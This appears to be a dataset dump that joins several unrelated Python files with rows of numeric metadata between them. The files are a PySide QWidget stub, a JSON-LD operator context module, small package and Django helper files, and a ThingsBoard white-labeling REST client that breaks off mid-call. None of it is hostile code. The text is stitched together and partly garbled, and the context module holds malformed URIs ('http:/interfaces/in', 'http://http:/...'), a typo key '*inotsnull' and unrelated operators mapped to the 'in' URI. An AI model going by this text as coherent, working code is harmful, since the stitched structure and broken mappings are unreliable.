def accessibleName(self, *args, **kwargs): # real signature unknown
pass
def actionEvent(self, *args, **kwargs): # real signature unknown
pass
def actions(self, *args, **kwargs): # real signature unknown
pass
def activateWindow(self, *args, **kwargs): # real signature unknown
pass
def addAction(self, *args, **kwargs): # real signature unknown
pass
def addActions(self, *args, **kwargs): # real signature unknown
pass
def adjustSize(self, *args, **kwargs): # real signature unknown
pass
def autoFillBackground(self, *args, **kwargs): # real signature unknown
pass
def backgroundRole(self, *args, **kwargs): # real signature unknown
pass
def baseSize(self, *args, **kwargs): # real signature unknown
pass
def changeEvent(self, *args, **kwargs): # real signature unknown
pass
def childAt(self, *args, **kwargs): # real signature unknown
pass
def childrenRect(self, *args, **kwargs): # real signature unknown
pass
def childrenRegion(self, *args, **kwargs): # real signature unknown
pass
def clearFocus(self, *args, **kwargs): # real signature unknown
pass
def clearMask(self, *args, **kwargs): # real signature unknown
pass
def close(self, *args, **kwargs): # real signature unknown
pass
def closeEvent(self, *args, **kwargs): # real signature unknown
pass
def contentsMargins(self, *args, **kwargs): # real signature unknown
pass
def contentsRect(self, *args, **kwargs): # real signature unknown
pass
def contextMenuEvent(self, *args, **kwargs): # real signature unknown
pass
def contextMenuPolicy(self, *args, **kwargs): # real signature unknown
pass
def createWinId(self, *args, **kwargs): # real signature unknown
pass
def cursor(self, *args, **kwargs): # real signature unknown
pass
def customContextMenuRequested(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def destroy(self, *args, **kwargs): # real signature unknown
pass
def devType(self, *args, **kwargs): # real signature unknown
pass
def dragEnterEvent(self, *args, **kwargs): # real signature unknown
pass
def dragLeaveEvent(self, *args, **kwargs): # real signature unknown
pass
def dragMoveEvent(self, *args, **kwargs): # real signature unknown
pass
def dropEvent(self, *args, **kwargs): # real signature unknown
pass
def effectiveWinId(self, *args, **kwargs): # real signature unknown
pass
def ensurePolished(self, *args, **kwargs): # real signature unknown
pass
def enterEvent(self, *args, **kwargs): # real signature unknown
pass
def event(self, *args, **kwargs): # real signature unknown
pass
def focusInEvent(self, *args, **kwargs): # real signature unknown
pass
def focusNextChild(self, *args, **kwargs): # real signature unknown
pass
def focusNextPrevChild(self, *args, **kwargs): # real signature unknown
pass
def focusOutEvent(self, *args, **kwargs): # real signature unknown
pass
def focusPolicy(self, *args, **kwargs): # real signature unknown
pass
def focusPreviousChild(self, *args, **kwargs): # real signature unknown
pass
def focusProxy(self, *args, **kwargs): # real signature unknown
pass
def focusWidget(self, *args, **kwargs): # real signature unknown
pass
def font(self, *args, **kwargs): # real signature unknown
pass
def fontInfo(self, *args, **kwargs): # real signature unknown
pass
def fontMetrics(self, *args, **kwargs): # real signature unknown
pass
def foregroundRole(self, *args, **kwargs): # real signature unknown
pass
def frameGeometry(self, *args, **kwargs): # real signature unknown
pass
def frameSize(self, *args, **kwargs): # real signature unknown
pass
def geometry(self, *args, **kwargs): # real signature unknown
pass
def getContentsMargins(self, *args, **kwargs): # real signature unknown
pass
def grabGesture(self, *args, **kwargs): # real signature unknown
pass
def grabKeyboard(self, *args, **kwargs): # real signature unknown
pass
def grabMouse(self, *args, **kwargs): # real signature unknown
pass
def grabShortcut(self, *args, **kwargs): # real signature unknown
pass
def graphicsEffect(self, *args, **kwargs): # real signature unknown
pass
def graphicsProxyWidget(self, *args, **kwargs): # real signature unknown
pass
def hasFocus(self, *args, **kwargs): # real signature unknown
pass
def hasMouseTracking(self, *args, **kwargs): # real signature unknown
pass
def height(self, *args, **kwargs): # real signature unknown
pass
def heightForWidth(self, *args, **kwargs): # real signature unknown
pass
def hide(self, *args, **kwargs): # real signature unknown
pass
def hideEvent(self, *args, **kwargs): # real signature unknown
pass
def inputContext(self, *args, **kwargs): # real signature unknown
pass
def inputMethodEvent(self, *args, **kwargs): # real signature unknown
pass
def inputMethodHints(self, *args, **kwargs): # real signature unknown
pass
def inputMethodQuery(self, *args, **kwargs): # real signature unknown
pass
def insertAction(self, *args, **kwargs): # real signature unknown
pass
def insertActions(self, *args, **kwargs): # real signature unknown
pass
def isActiveWindow(self, *args, **kwargs): # real signature unknown
pass
def isAncestorOf(self, *args, **kwargs): # real signature unknown
pass
def isEnabled(self, *args, **kwargs): # real signature unknown
pass
def isEnabledTo(self, *args, **kwargs): # real signature unknown
pass
def isFullScreen(self, *args, **kwargs): # real signature unknown
pass
def isHidden(self, *args, **kwargs): # real signature unknown
pass
def isLeftToRight(self, *args, **kwargs): # real signature unknown
pass
def isMaximized(self, *args, **kwargs): # real signature unknown
pass
def isMinimized(self, *args, **kwargs): # real signature unknown
pass
def isModal(self, *args, **kwargs): # real signature unknown
pass
def isRightToLeft(self, *args, **kwargs): # real signature unknown
pass
def isVisible(self, *args, **kwargs): # real signature unknown
pass
def isVisibleTo(self, *args, **kwargs): # real signature unknown
pass
def isWindow(self, *args, **kwargs): # real signature unknown
pass
def isWindowModified(self, *args, **kwargs): # real signature unknown
pass
def keyboardGrabber(self, *args, **kwargs): # real signature unknown
pass
def keyPressEvent(self, *args, **kwargs): # real signature unknown
pass
def keyReleaseEvent(self, *args, **kwargs): # real signature unknown
pass
def languageChange(self, *args, **kwargs): # real signature unknown
pass
def layout(self, *args, **kwargs): # real signature unknown
pass
def layoutDirection(self, *args, **kwargs): # real signature unknown
pass
def leaveEvent(self, *args, **kwargs): # real signature unknown
pass
def locale(self, *args, **kwargs): # real signature unknown
pass
def lower(self, *args, **kwargs): # real signature unknown
pass
def mapFrom(self, *args, **kwargs): # real signature unknown
pass
def mapFromGlobal(self, *args, **kwargs): # real signature unknown
pass
def mapFromParent(self, *args, **kwargs): # real signature unknown
pass
def mapTo(self, *args, **kwargs): # real signature unknown
pass
def mapToGlobal(self, *args, **kwargs): # real signature unknown
pass
def mapToParent(self, *args, **kwargs): # real signature unknown
pass
def mask(self, *args, **kwargs): # real signature unknown
pass
def maximumHeight(self, *args, **kwargs): # real signature unknown
pass
def maximumSize(self, *args, **kwargs): # real signature unknown
pass
def maximumWidth(self, *args, **kwargs): # real signature unknown
pass
def metric(self, *args, **kwargs): # real signature unknown
pass
def minimumHeight(self, *args, **kwargs): # real signature unknown
pass
def minimumSize(self, *args, **kwargs): # real signature unknown
pass
def minimumSizeHint(self, *args, **kwargs): # real signature unknown
pass
def minimumWidth(self, *args, **kwargs): # real signature unknown
pass
def mouseDoubleClickEvent(self, *args, **kwargs): # real signature unknown
pass
def mouseGrabber(self, *args, **kwargs): # real signature unknown
pass
def mouseMoveEvent(self, *args, **kwargs): # real signature unknown
pass
def mousePressEvent(self, *args, **kwargs): # real signature unknown
pass
def mouseReleaseEvent(self, *args, **kwargs): # real signature unknown
pass
def move(self, *args, **kwargs): # real signature unknown
pass
def moveEvent(self, *args, **kwargs): # real signature unknown
pass
def nativeParentWidget(self, *args, **kwargs): # real signature unknown
pass
def nextInFocusChain(self, *args, **kwargs): # real signature unknown
pass
def normalGeometry(self, *args, **kwargs): # real signature unknown
pass
def overrideWindowFlags(self, *args, **kwargs): # real signature unknown
pass
def overrideWindowState(self, *args, **kwargs): # real signature unknown
pass
def paintEngine(self, *args, **kwargs): # real signature unknown
pass
def paintEvent(self, *args, **kwargs): # real signature unknown
pass
def palette(self, *args, **kwargs): # real signature unknown
pass
def parentWidget(self, *args, **kwargs): # real signature unknown
pass
def pos(self, *args, **kwargs): # real signature unknown
pass
def previousInFocusChain(self, *args, **kwargs): # real signature unknown
pass
def raise_(self, *args, **kwargs): # real signature unknown
pass
def rect(self, *args, **kwargs): # real signature unknown
pass
def releaseKeyboard(self, *args, **kwargs): # real signature unknown
pass
def releaseMouse(self, *args, **kwargs): # real signature unknown
pass
def releaseShortcut(self, *args, **kwargs): # real signature unknown
pass
def removeAction(self, *args, **kwargs): # real signature unknown
pass
def render(self, *args, **kwargs): # real signature unknown
pass
def repaint(self, *args, **kwargs): # real signature unknown
pass
def resetInputContext(self, *args, **kwargs): # real signature unknown
pass
def resize(self, *args, **kwargs): # real signature unknown
pass
def resizeEvent(self, *args, **kwargs): # real signature unknown
pass
def restoreGeometry(self, *args, **kwargs): # real signature unknown
pass
def saveGeometry(self, *args, **kwargs): # real signature unknown
pass
def scroll(self, *args, **kwargs): # real signature unknown
pass
def setAcceptDrops(self, *args, **kwargs): # real signature unknown
pass
def setAccessibleDescription(self, *args, **kwargs): # real signature unknown
pass
def setAccessibleName(self, *args, **kwargs): # real signature unknown
pass
def setAttribute(self, *args, **kwargs): # real signature unknown
pass
def setAutoFillBackground(self, *args, **kwargs): # real signature unknown
pass
def setBackgroundRole(self, *args, **kwargs): # real signature unknown
pass
def setBaseSize(self, *args, **kwargs): # real signature unknown
pass
def setContentsMargins(self, *args, **kwargs): # real signature unknown
pass
def setContextMenuPolicy(self, *args, **kwargs): # real signature unknown
pass
def setCursor(self, *args, **kwargs): # real signature unknown
pass
def setDisabled(self, *args, **kwargs): # real signature unknown
pass
def setEnabled(self, *args, **kwargs): # real signature unknown
pass
def setFixedHeight(self, *args, **kwargs): # real signature unknown
pass
def setFixedSize(self, *args, **kwargs): # real signature unknown
pass
def setFixedWidth(self, *args, **kwargs): # real signature unknown
pass
def setFocus(self, *args, **kwargs): # real signature unknown
pass
def setFocusPolicy(self, *args, **kwargs): # real signature unknown
pass
def setFocusProxy(self, *args, **kwargs): # real signature unknown
pass
def setFont(self, *args, **kwargs): # real signature unknown
pass
def setForegroundRole(self, *args, **kwargs): # real signature unknown
pass
def setGeometry(self, *args, **kwargs): # real signature unknown
pass
def setGraphicsEffect(self, *args, **kwargs): # real signature unknown
pass
def setHidden(self, *args, **kwargs): # real signature unknown
pass
def setInputContext(self, *args, **kwargs): # real signature unknown
pass
def setInputMethodHints(self, *args, **kwargs): # real signature unknown
pass
def setLayout(self, *args, **kwargs): # real signature unknown
pass
def setLayoutDirection(self, *args, **kwargs): # real signature unknown
pass
def setLocale(self, *args, **kwargs): # real signature unknown
pass
def setMask(self, *args, **kwargs): # real signature unknown
pass
def setMaximumHeight(self, *args, **kwargs): # real signature unknown
pass
def setMaximumSize(self, *args, **kwargs): # real signature unknown
pass
def setMaximumWidth(self, *args, **kwargs): # real signature unknown
pass
def setMinimumHeight(self, *args, **kwargs): # real signature unknown
pass
def setMinimumSize(self, *args, **kwargs): # real signature unknown
pass
def setMinimumWidth(self, *args, **kwargs): # real signature unknown
pass
def setMouseTracking(self, *args, **kwargs): # real signature unknown
pass
def setPalette(self, *args, **kwargs): # real signature unknown
pass
def setParent(self, *args, **kwargs): # real signature unknown
pass
def setShortcutAutoRepeat(self, *args, **kwargs): # real signature unknown
pass
def setShortcutEnabled(self, *args, **kwargs): # real signature unknown
pass
def setSizeIncrement(self, *args, **kwargs): # real signature unknown
pass
def setSizePolicy(self, *args, **kwargs): # real signature unknown
pass
def setStatusTip(self, *args, **kwargs): # real signature unknown
pass
def setStyle(self, *args, **kwargs): # real signature unknown
pass
def setStyleSheet(self, *args, **kwargs): # real signature unknown
pass
def setTabOrder(self, *args, **kwargs): # real signature unknown
pass
def setToolTip(self, *args, **kwargs): # real signature unknown
pass
def setUpdatesEnabled(self, *args, **kwargs): # real signature unknown
pass
def setVisible(self, *args, **kwargs): # real signature unknown
pass
def setWhatsThis(self, *args, **kwargs): # real signature unknown
pass
def setWindowFilePath(self, *args, **kwargs): # real signature unknown
pass
def setWindowFlags(self, *args, **kwargs): # real signature unknown
pass
def setWindowIcon(self, *args, **kwargs): # real signature unknown
pass
def setWindowIconText(self, *args, **kwargs): # real signature unknown
pass
def setWindowModality(self, *args, **kwargs): # real signature unknown
pass
def setWindowModified(self, *args, **kwargs): # real signature unknown
pass
def setWindowOpacity(self, *args, **kwargs): # real signature unknown
pass
def setWindowRole(self, *args, **kwargs): # real signature unknown
pass
def setWindowState(self, *args, **kwargs): # real signature unknown
pass
def setWindowTitle(self, *args, **kwargs): # real signature unknown
pass
def show(self, *args, **kwargs): # real signature unknown
pass
def showEvent(self, *args, **kwargs): # real signature unknown
pass
def showFullScreen(self, *args, **kwargs): # real signature unknown
pass
def showMaximized(self, *args, **kwargs): # real signature unknown
pass
def showMinimized(self, *args, **kwargs): # real signature unknown
pass
def showNormal(self, *args, **kwargs): # real signature unknown
pass
def size(self, *args, **kwargs): # real signature unknown
pass
def sizeHint(self, *args, **kwargs): # real signature unknown
pass
def sizeIncrement(self, *args, **kwargs): # real signature unknown
pass
def sizePolicy(self, *args, **kwargs): # real signature unknown
pass
def stackUnder(self, *args, **kwargs): # real signature unknown
pass
def statusTip(self, *args, **kwargs): # real signature unknown
pass
def style(self, *args, **kwargs): # real signature unknown
pass
def styleSheet(self, *args, **kwargs): # real signature unknown
pass
def tabletEvent(self, *args, **kwargs): # real signature unknown
pass
def testAttribute(self, *args, **kwargs): # real signature unknown
pass
def toolTip(self, *args, **kwargs): # real signature unknown
pass
def underMouse(self, *args, **kwargs): # real signature unknown
pass
def ungrabGesture(self, *args, **kwargs): # real signature unknown
pass
def unsetCursor(self, *args, **kwargs): # real signature unknown
pass
def unsetLayoutDirection(self, *args, **kwargs): # real signature unknown
pass
def unsetLocale(self, *args, **kwargs): # real signature unknown
pass
def update(self, *args, **kwargs): # real signature unknown
pass
def updateGeometry(self, *args, **kwargs): # real signature unknown
pass
def updateMicroFocus(self, *args, **kwargs): # real signature unknown
pass
def updatesEnabled(self, *args, **kwargs): # real signature unknown
pass
def visibleRegion(self, *args, **kwargs): # real signature unknown
pass
def whatsThis(self, *args, **kwargs): # real signature unknown
pass
def wheelEvent(self, *args, **kwargs): # real signature unknown
pass
def width(self, *args, **kwargs): # real signature unknown
pass
def window(self, *args, **kwargs): # real signature unknown
pass
def windowFilePath(self, *args, **kwargs): # real signature unknown
pass
def windowFlags(self, *args, **kwargs): # real signature unknown
pass
def windowIcon(self, *args, **kwargs): # real signature unknown
pass
def windowIconText(self, *args, **kwargs): # real signature unknown
pass
def windowModality(self, *args, **kwargs): # real signature unknown
pass
def windowOpacity(self, *args, **kwargs): # real signature unknown
pass
def windowRole(self, *args, **kwargs): # real signature unknown
pass
def windowState(self, *args, **kwargs): # real signature unknown
pass
def windowTitle(self, *args, **kwargs): # real signature unknown
pass
def windowType(self, *args, **kwargs): # real signature unknown
pass
def winEvent(self, *args, **kwargs): # real signature unknown
pass
def winId(self, *args, **kwargs): # real signature unknown
pass
def x(self, *args, **kwargs): # real signature unknown
pass
def y(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
DrawChildren = PySide.QtGui.QWidget.RenderFlag.DrawChildren
DrawWindowBackground = PySide.QtGui.QWidget.RenderFlag.DrawWindowBackground
IgnoreMask = PySide.QtGui.QWidget.RenderFlag.IgnoreMask
RenderFlag = None # (!) real value is "<type 'PySide.QtGui.QWidget.RenderFlag'>"
RenderFlags = None # (!) real value is "<type 'RenderFlags'>"
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x0000000003F9F348>'
| 28.182171
| 106
| 0.634438
| 2,352
| 21,813
| 5.871599
| 0.132228
| 0.234395
| 0.360608
| 0.323244
| 0.738306
| 0.735554
| 0.733092
| 0.73034
| 0
| 0
| 0
| 0.00136
| 0.258332
| 21,813
| 773
| 107
| 28.218629
| 0.852269
| 0.281988
| 0
| 0.489195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.489195
| false
| 0.489195
| 0.005894
| 0
| 0.508841
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
62426300f28b8c6a0c9bd02a4c411708a3f324bd
| 3,826
|
py
|
Python
|
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
from hyper_resource.contexts import ContextResource
class SubBooleanOperatorResourceContext(ContextResource):
def attributes_contextualized_dict(self):
dic_context = {
"in": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"*in": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"isnull": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"*isnull": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"isnotnull": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"*inotsnull": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"between": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"*between": {'@id': "http:/interfaces/in", '@type': "http:/interfaces/in"},
"eq": {'@id': "http://schema.org/equal", '@type': "http://schema.org/equal"},
"neq": {'@id': "http://schema.org/nonEqual", '@type': "http://schema.org/nonEqual"},
"*neq": {'@id': "http://schema.org/nonEqual", '@type': "http://schema.org/nonEqual"},
"*eq": {'@id': "http://schema.org/equal", '@type': "http://schema.org/equal"},
"*noeq": {'@id': "http://schema.org/nonEqual", '@type': "http://schema.org/nonEqual"},
"lt": {'@id': "http://schema.org/lesser", '@type': "http://schema.org/lesser"},
"*lt": {'@id': "http://schema.org/lesser", '@type': "http://schema.org/lesser"},
"lte": {'@id': "http://schema.org/lesserOrEqual", '@type': "http://schema.org/lesserOrEqual"},
"*lte": {'@id': "http://schema.org/lesserOrEqual", '@type': "http://schema.org/lesserOrEqual"},
"gt": {'@id': "http://schema.org/greater", '@type': "http://schema.org/greater"},
"*gt": {'@id': "http://schema.org/greater", '@type': "http://schema.org/greater"},
"gte": {'@id': "http://schema.org/greaterOrEqual", '@type': "http://schema.org/greaterOrEqual"},
"*gte": {'@id': "http://schema.org/greaterOrEqual", '@type': "http://schema.org/greaterOrEqual"}
}
return dic_context
def context(self):
self.dict_context = {}
self.dict_context["@context"] = self.attributes_contextualized_dict()
self.dict_context["@id"] = "http://http:/interfaces/SubBooleanOperators"
self.dict_context["@type"] = "SubBooleanOperators"
return self.dict_context
class LogicalOperatorResourceContext(ContextResource):
def attributes_contextualized_dict(self):
dic_context = {
"or": {'@id': "http:/interfaces/or", '@type': "http:/interfaces/or"},
"*or": {'@id': "http:/interfaces/or", '@type': "http:/interfaces/or"},
"and": {'@id': "http:/interfaces/and", '@type': "http:/interfaces/and"},
"*and": {'@id': "http:/interfaces/and", '@type': "http:/interfaces/and"},
}
return dic_context
def context(self):
self.dict_context = {}
self.dict_context["@context"] = self.attributes_contextualized_dict()
self.dict_context["@id"] = "http://http:/interfaces/LogicalOperators"
self.dict_context["@type"] = "LogicalOperator"
return self.dict_context
| 64.847458
| 133
| 0.490068
| 345
| 3,826
| 5.368116
| 0.133333
| 0.087473
| 0.182505
| 0.105292
| 0.843413
| 0.843413
| 0.843413
| 0.843413
| 0.758099
| 0.645788
| 0
| 0
| 0.302927
| 3,826
| 58
| 134
| 65.965517
| 0.694413
| 0
| 0
| 0.291667
| 0
| 0
| 0.420805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.020833
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6245fb956bb988793c9c619281a9786f252bb9a9
| 66
|
py
|
Python
|
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | 1
|
2021-07-05T11:46:20.000Z
|
2021-07-05T11:46:20.000Z
|
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | null | null | null |
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | null | null | null |
from rafft.rafft import fold
from rafft.rafft_kin import kinetics
| 22
| 36
| 0.848485
| 11
| 66
| 5
| 0.545455
| 0.327273
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 37
| 33
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
625b3909194bf185be27d0762074cf8ccb51cc3c
| 134
|
py
|
Python
|
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings # import the settings file
def logout_url(context):
return {'LOGOUT_URL': settings.LOGOUT_URL}
| 22.333333
| 59
| 0.768657
| 19
| 134
| 5.263158
| 0.631579
| 0.27
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 5
| 60
| 26.8
| 0.877193
| 0.179104
| 0
| 0
| 0
| 0
| 0.092593
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
625dfba36e617e1a8918fce9de0e751f7164c5e8
| 60
|
py
|
Python
|
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | null | null | null |
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | null | null | null |
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | 1
|
2017-08-04T04:29:07.000Z
|
2017-08-04T04:29:07.000Z
|
def test():
print("musicmood module imported succesfully")
| 20
| 47
| 0.766667
| 7
| 60
| 6.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 48
| 30
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.616667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
654fb879e541dc0de97bd611c9feffc0c0d6e01e
| 41,020
|
py
|
Python
|
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class WhiteLabelingControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_app_theme_css_using_post(self, palette_settings, **kwargs): # noqa: E501
"""getAppThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_app_theme_css_using_post(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_app_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
else:
(data) = self.get_app_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
return data
def get_app_theme_css_using_post_with_http_info(self, palette_settings, **kwargs): # noqa: E501
"""getAppThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_app_theme_css_using_post_with_http_info(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['palette_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'palette_settings' is set
if ('palette_settings' not in params or
params['palette_settings'] is None):
raise ValueError("Missing the required parameter `palette_settings` when calling `get_app_theme_css_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'palette_settings' in params:
body_params = params['palette_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['plain/text']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/appThemeCss', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_current_login_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getCurrentLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_login_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_current_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_current_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_current_login_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getCurrentLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_login_white_label_params_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/currentLoginWhiteLabelParams', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
